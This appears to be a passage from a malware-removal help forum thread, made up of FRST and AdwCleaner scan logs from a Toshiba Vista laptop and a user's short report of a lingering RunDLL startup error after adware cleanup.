(x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMP\CLBrowserEngine.exe FirewallRules: [{A249412C-65ED-478F-A265-730F2670C0CB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMS\CLMSService.exe FirewallRules: [{B7258A50-52F6-4718-AA9D-F64826CF7940}] => (Allow) LPort=80 FirewallRules: [{783ED446-2EB5-4D16-AA1E-E2891F07EE59}] => (Allow) LPort=80 FirewallRules: [{70403FF4-1D67-4D9B-B897-BA6F806EACA6}] => (Allow) LPort=80 FirewallRules: [{D2221019-1105-4A94-89C3-3937E8375ED2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{2C84BC51-F1B7-4BAB-ADBF-0543D8DF3E29}] => (Allow) LPort=2869 FirewallRules: [{D84264C9-3FEF-42B5-8D9F-11A47526CF13}] => (Allow) LPort=1900 FirewallRules: [{789E738D-DA66-4A05-B263-F7D8AFE251B2}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{9395CA26-0EC4-458B-ACD7-E1A49CC22B00}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe FirewallRules: [{B7B911B3-E1A8-4E65-AFA0-AFCF782744C5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{3F71D384-650E-4A4C-B0BE-0791DBAF9E52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{E8190506-4194-426F-9C00-B06D1C8072CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{FF7A96AF-877F-41DF-B6A7-A5490ECE3775}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Restore Points ========================= 09-09-2015 11:00:57 Windows Update 10-09-2015 18:07:18 Windows Update 15-09-2015 07:55:18 Windows Update 18-09-2015 17:16:42 Windows Update 22-09-2015 14:11:34 Windows Update 26-09-2015 09:52:55 Windows Update 30-09-2015 10:34:26 Windows Update 03-10-2015 14:53:55 Windows Update 07-10-2015 17:52:14 Windows Update 11-10-2015 19:12:09 Windows Update 14-10-2015 19:51:23 Windows Update 15-10-2015 09:28:46 Windows Update 19-10-2015 11:40:48 Windows Update 22-10-2015 17:02:18 Windows Update 29-10-2015 19:01:20 Windows Update 03-11-2015 10:52:06 Windows Update 08-11-2015 11:52:57 Windows Update 12-11-2015 20:50:58 Windows Update 12-11-2015 21:46:25 Windows Update 16-11-2015 15:08:37 Windows Update 20-11-2015 19:26:46 Windows Update 27-11-2015 19:04:56 Windows Update 01-12-2015 12:15:00 Windows Update 04-12-2015 15:03:04 Windows Update 11-12-2015 12:52:52 Windows Update 14-12-2015 12:24:39 Windows Update 17-12-2015 18:42:37 Windows Update 26-12-2015 11:41:26 Windows Update 29-12-2015 21:04:35 Windows Update 03-01-2016 21:07:54 Windows Update 08-01-2016 18:16:31 Windows Update 16-01-2016 08:03:26 Windows Update 17-01-2016 11:42:08 Windows Update 21-01-2016 12:58:31 Windows Update 23-01-2016 18:29:26 Removed Ask Toolbar. 23-01-2016 18:35:35 Removed SlimCleaner Plus 29-01-2016 17:25:50 Removed Bing Bar 29-01-2016 17:45:18 Windows Update ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (01/30/2016 12:16:33 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/29/2016 05:31:49 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/29/2016 05:28:52 PM) (Source: EventSystem) (EventID: 4621) (User: ) Description: 80070005EventSystem.EventSubscription{60E12429-8258-44D3-B6B8-1E56EC5E24C3}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000} Error: (01/29/2016 05:11:25 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/27/2016 03:17:02 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/27/2016 03:06:33 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/26/2016 03:26:31 AM) (Source: EventSystem) (EventID: 4621) (User: ) Description: 80070005EventSystem.EventSubscription{6B3B7FCC-8870-4356-B799-369B66E9E2D1}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000} Error: (01/26/2016 02:58:19 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/24/2016 02:45:42 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/24/2016 02:39:15 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 System errors: ============= Error: (01/30/2016 12:15:57 PM) (Source: Dhcp) (EventID: 1002) (User: ) Description: The IP address lease 10.0.0.10 for the Network Card with network address 001E65142DE0 has been denied by the DHCP server 192.168.1.254 (The DHCP Server sent a DHCPNACK message). Error: (01/29/2016 05:57:29 PM) (Source: ssidrv) (EventID: 26) (User: ) Description: Failed to set monitor event rule. Error: (01/29/2016 05:38:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 115.31.0.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/29/2016 05:37:42 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/29/2016 05:37:42 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/29/2016 05:36:50 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY59 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\SYSTEM Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/29/2016 05:31:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: ConfigFree Service%%1053 Error: (01/29/2016 05:31:49 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: 30000ConfigFree Service Error: (01/29/2016 05:28:52 PM) (Source: ssidrv) (EventID: 26) (User: ) Description: Failed to set monitor event rule. Error: (01/29/2016 05:24:22 PM) (Source: Dhcp) (EventID: 1002) (User: ) Description: The IP address lease 10.236.153.51 for the Network Card with network address 001E65142DE0 has been denied by the DHCP server 10.0.0.1 (The DHCP Server sent a DHCPNACK message). CodeIntegrity: =================================== Date: 2016-01-30 12:35:59.759 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:59.556 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:59.228 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:58.885 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:58.495 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:58.230 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:57.855 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:57.653 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:15.566 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-30 12:35:15.230 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core2 Duo CPU P7350 @ 2.00GHz Percentage of memory in use: 43% Total physical RAM: 4093.04 MB Available physical RAM: 2331 MB Total Virtual: 8393.36 MB Available Virtual: 6361.18 MB ==================== Drives ================================ Drive c: (TI100343V0F) (Fixed) (Total:454.05 GB) (Free:335.62 GB) NTFS ==>[drive with boot components (obtained from BCD)] ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 008CB0AA) Partition 1: (Not Active) - (Size=1.5 GB) - (Type=27) Partition 2: (Active) - (Size=454.1 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=10.2 GB) - (Type=17) ==================== End of Addition.txt ============================

The internet connection seems all fixed now. So thats good. However, on startup the Pc always displays this error message: ------------------------------------------------------------------ RunDLL Error loading\3\LXCYtime.dll The specified module could not be found ------------------------------------------------------------- FYI it was already doing this before you helped me, ever since the initial MB scan Although i believe it might list different file names sometimes

# AdwCleaner v5.031 - Logfile created 27/01/2016 at 03:13:36 # Updated 25/01/2016 by Xplode # Database : 2016-01-25.3 [Local] # Operating system : Windows Vista Home Premium Service Pack 2 (x64) # Username : Barbara - BARBARA-PC # Running from : C:\Users\Barbara\Desktop\AdwCleaner.exe # Option : Cleaning # Support : http://toolslib.net/forum ***** [ Services ] ***** [-] Service Deleted : CouponPrinterService [-] Service Deleted : swdumon ***** [ Folders ] ***** [#] Folder Deleted : C:\Program Files\PC Optimizer Pro [#] Folder Deleted : C:\Program Files\WebBar [#] Folder Deleted : C:\Program Files (x86)\Coupons [#] Folder Deleted : C:\Program Files (x86)\driverupdate [#] Folder Deleted : C:\Program Files (x86)\OneSystemCare [#] Folder Deleted : C:\Program Files (x86)\Yahoo!\Companion [#] Folder Deleted : C:\ProgramData\CrimeWatch [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\driverupdate [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Optimizer Pro [#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin [#] Folder Deleted : C:\Users\Barbara\AppData\Local\FinanceAlert [#] Folder Deleted : C:\Users\Barbara\AppData\Local\StormWatch [#] Folder Deleted : C:\Users\Barbara\AppData\Local\WebBar [#] Folder Deleted : C:\Users\Barbara\AppData\LocalLow\Yahoo! Companion [#] Folder Deleted : C:\Users\Barbara\AppData\LocalLow\Yahoo!\Companion [#] Folder Deleted : C:\Users\Barbara\AppData\Roaming\Yahoo!\Companion [#] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\iac ***** [ Files ] ***** [-] File Deleted : C:\Windows\SysNative\drivers\swdumon.sys [-] File Deleted : C:\Windows\SysWOW64\pmls.dll ***** [ DLLs ] ***** ***** [ Shortcuts ] ***** ***** [ Scheduled tasks ] ***** ***** [ Registry ] ***** [-] Key Deleted : HKCU\Software\Classes\CLSID\{554EBE31-AEC1-4E34-BCE3-606467760D88} [-] Key Deleted : HKCU\Software\Classes\CLSID\{0FEB2313-F89B-4AC6-8153-84025604A06A} [-] Key Deleted : HKCU\Software\Classes\CLSID\{F8534A9F-4F29-4FDC-9CD9-023ACF0EF9B9} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{95B92D92-8B7D-4A19-A3F1-43113B4DBCAF} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{02F878DF-E2BE-4B85-8CB4-A0D2D4E2ED7F} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2AF343DD-3102-4F9D-AC95-DCA4C95382C7} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3137BC14-D8D7-4B67-8FFA-2E0B2E9D541B} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4CA2AC92-971B-47B1-ACB6-357B552155AC} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{52C5395B-1FCD-47FA-A834-FD830701C2D5} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{5D3DCC39-9233-4330-94E9-DA92BE49CA1A} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{615FACDF-DADB-440D-AC91-8AAB0AE9E3AD} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{762D463B-C45A-456D-A80D-8689C297C91E} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{7A6BE473-7960-44D0-BD54-D23DA76353DF} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{803F550E-BAAE-42BB-8917-64BA0006AB17} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{8D5BC51D-C9D3-43B9-B728-B30677B7C7E8} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{991C9D8D-A789-4DB9-BDFC-5F33398B04BF} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A5ACC874-D943-483F-A2D1-14598D51F872} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B0474212-0D9D-4361-90B3-B89D1A44275D} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BFDE183A-C6FE-41D2-80F9-586C29210AC2} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D83C83BF-3EDD-4410-ADAB-5295116DD8C7} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{DD260902-9420-4055-A956-9152EB4F3E6A} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EB1F9F3C-5526-4DAE-BD4B-3EAA7715DA9F} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{F1912128-469A-4138-AA26-9699C15BB13E} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{F68DC16C-9C2B-455B-8853-7E4D34BAA3F4} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FBA8498F-B3A0-4942-A2BF-E0CB7BC7E000} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0510789C-5E5D-4FA3-A3EF-2D56FDE5090A} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{934063FB-A81D-4849-B02C-478446DF3219} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B34A6A15-1F6F-4A19-A9DD-8B44C874A20B} [!] Key Not Deleted : HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62} [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{5297E905-1DFB-4A9C-9871-A4F95FD58945} [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{34979CB5-728D-4727-81BF-01850A3BB89B} [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A3866408-A46D-4421-816F-F34D7247A046} [-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} [-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D4027C7F-154A-4066-A1AD-4243D8127440} [-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} [-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D4027C7F-154A-4066-A1AD-4243D8127440} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{2FF49ED5-A3EF-410B-918E-97DECEB5996D} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89CC5A31-B592-4BB3-82F5-BD8ACA3E0BF0} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4E7F49ED-8C94-4AAA-A407-3010D099B11A} [!] Key Not Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4e7f49ed-8c94-4aaa-a407-3010d099b11a} [!] Key Not Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89cc5a31-b592-4bb3-82f5-bd8aca3e0bf0} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9dffaa5f-44c6-4ff2-80ee-76368d0a2e75} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e017ef59-8c1e-4124-bf6d-6d647d01e352} [-] Value Deleted : HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{D4027C7F-154A-4066-A1AD-4243D8127440}] [-] Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{D4027C7F-154A-4066-A1AD-4243D8127440}] [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4} [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{95B92D92-8B7D-4A19-A3F1-43113B4DBCAF} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{02F878DF-E2BE-4B85-8CB4-A0D2D4E2ED7F} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2AF343DD-3102-4F9D-AC95-DCA4C95382C7} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3137BC14-D8D7-4B67-8FFA-2E0B2E9D541B} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4CA2AC92-971B-47B1-ACB6-357B552155AC} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{52C5395B-1FCD-47FA-A834-FD830701C2D5} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{5D3DCC39-9233-4330-94E9-DA92BE49CA1A} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{615FACDF-DADB-440D-AC91-8AAB0AE9E3AD} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{762D463B-C45A-456D-A80D-8689C297C91E} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{7A6BE473-7960-44D0-BD54-D23DA76353DF} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{803F550E-BAAE-42BB-8917-64BA0006AB17} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{8D5BC51D-C9D3-43B9-B728-B30677B7C7E8} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{991C9D8D-A789-4DB9-BDFC-5F33398B04BF} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A5ACC874-D943-483F-A2D1-14598D51F872} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B0474212-0D9D-4361-90B3-B89D1A44275D} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BFDE183A-C6FE-41D2-80F9-586C29210AC2} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D83C83BF-3EDD-4410-ADAB-5295116DD8C7} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{DD260902-9420-4055-A956-9152EB4F3E6A} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EB1F9F3C-5526-4DAE-BD4B-3EAA7715DA9F} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{F1912128-469A-4138-AA26-9699C15BB13E} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{F68DC16C-9C2B-455B-8853-7E4D34BAA3F4} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FBA8498F-B3A0-4942-A2BF-E0CB7BC7E000} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0510789C-5E5D-4FA3-A3EF-2D56FDE5090A} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{934063FB-A81D-4849-B02C-478446DF3219} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B34A6A15-1F6F-4A19-A9DD-8B44C874A20B} [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62} [-] Key Deleted : HKCU\Software\BEFRUGAL [-] Key Deleted : HKCU\Software\DownloadAdmin [-] Key Deleted : HKCU\Software\SlimWare Utilities Inc [-] Key Deleted : HKLM\SOFTWARE\SLIMWARE UTILITIES, INC. [-] Key Deleted : HKLM\SOFTWARE\SlimWare Utilities Inc [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Coupon Printer for Windows5.0.1.6 [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{0BCE8B0A-1E76-44E5-9909-3CF804D92E4D}_is1 [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{79A765E1-C399-405B-85AF-466F52E918B0} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{eeb86aef-4a5d-4b75-9d74-f16d438fc286} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Coupon Printer for Windows5.0.1.6 [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\CrimeWatch [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\OneSystemCare [-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\Software\AskToolbar [-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\{9F6F6BFF-5270-44E3-8D40-0F2D89A64F42} [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\shopathome.com ***** [ Web browsers ] ***** [-] [C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\prefs.js] [Preference] Deleted : user_pref("plugin.state.npconduitfirefoxplugin", 0); ************************* :: "Tracing" keys removed :: Winsock settings cleared ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [11675 bytes] ##########

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:24-01-2016 Ran by Barbara (administrator) on BARBARA-PC (26-01-2016 03:06:09) Running from C:\Users\Barbara\Desktop Loaded Profiles: Barbara (Available Profiles: Barbara) Platform: Windows Vista Home Premium Service Pack 2 (X64) Language: English (United States) Internet Explorer Version 9 (Default browser: FF) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Webroot Software, Inc. ) C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (AMD) C:\Windows\System32\atiesrxx.exe (Microsoft Corporation) C:\Windows\System32\SLsvc.exe (AMD) C:\Windows\System32\atieclxx.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Agere Systems) C:\Windows\System32\agr64svc.exe (TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe (TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe (Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\rselect\RSelSvc.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE (TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe (TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe (CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe (CyberLink) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe 